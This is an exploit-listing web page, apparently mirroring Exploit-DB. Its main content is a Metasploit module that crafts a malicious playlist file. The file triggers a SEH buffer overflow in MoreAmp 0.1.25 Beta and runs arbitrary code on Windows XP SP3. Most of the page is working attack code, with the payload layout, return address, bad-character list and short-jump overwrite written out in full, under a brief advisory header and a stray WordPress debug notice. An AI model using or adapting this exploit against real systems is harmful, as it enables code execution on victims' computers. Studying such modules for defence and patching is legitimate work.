Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
MoreAmp Seh Buffer Overflow (meta) - exploit.company
header-logo
Suggest Exploit
vendor:
MoreAmp
by:
MadjiX
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: MoreAmp
Affected Version From: 0.1.25 Beta
Affected Version To: 0.1.25 Beta
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2010

MoreAmp Seh Buffer Overflow (meta)

This module exploits a SEH overflow in 0.1.25 MoreAmp Beta. By creating a specially crafted .m3u file, an attacker may be able to execute arbitrary code.

Mitigation:

Apply the latest patch or update to a non-vulnerable version.
Source

Exploit-DB raw data:

#MoreAmp Seh Buffer Overflow (meta)
#Greetz:His0k4 , Bibi-info , Volc4n0
#sec4ever.com
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh
 
    def initialize(info = {})
        super(update_info(info,
            'Name' => 'MoreAmp 0.1.25 Beta Buffer Overflow (SEH)',
            'Description' => %q{
                This module exploits a SEH overflow in 0.1.25 MoreAmp Beta
            By creating a specially crafted .m3u file, an an attacker may be able
            to execute arbitrary code.
            },
            'License' => MSF_LICENSE,
            'Author' => 'MadjiX',
            'Version' => 'Version 1',
            'References' =>
                [
                    [ 'OSVDB', '65789' ],
                    [ 'URL', 'http://www.exploit-db.com/exploits/13942/' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload' =>
                {
                    'Space' => 1400,
                    'BadChars' => "\x00\x20\x0a\x0d",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets' =>
                [
                    [ 'Windows XP SP3 Fr', { 'Ret' => 0x7C86467B} ], # 0x7C86467B jmp esp kernel.32
 
                ],
            'Privileged' => false,
            'DisclosureDate'  => '17-07-2010',
            'DefaultTarget' => 0))
 
        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file name.', 'MadjiX.maf']),
            ], self.class)
    end
 
 
    def exploit
 
        sploit = rand_text_alphanumeric(108)
        sploit << "\xeb\x06\x90\x90"
        sploit << [target.ret].pack('V')
        sploit << payload.encoded
        sploit << rand_text_alphanumeric(400 - payload.encoded.length)
 
        maffile = sploit
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(maffile)
 
    end
 
end

Navigation

Suggest Exploit

Services By CQR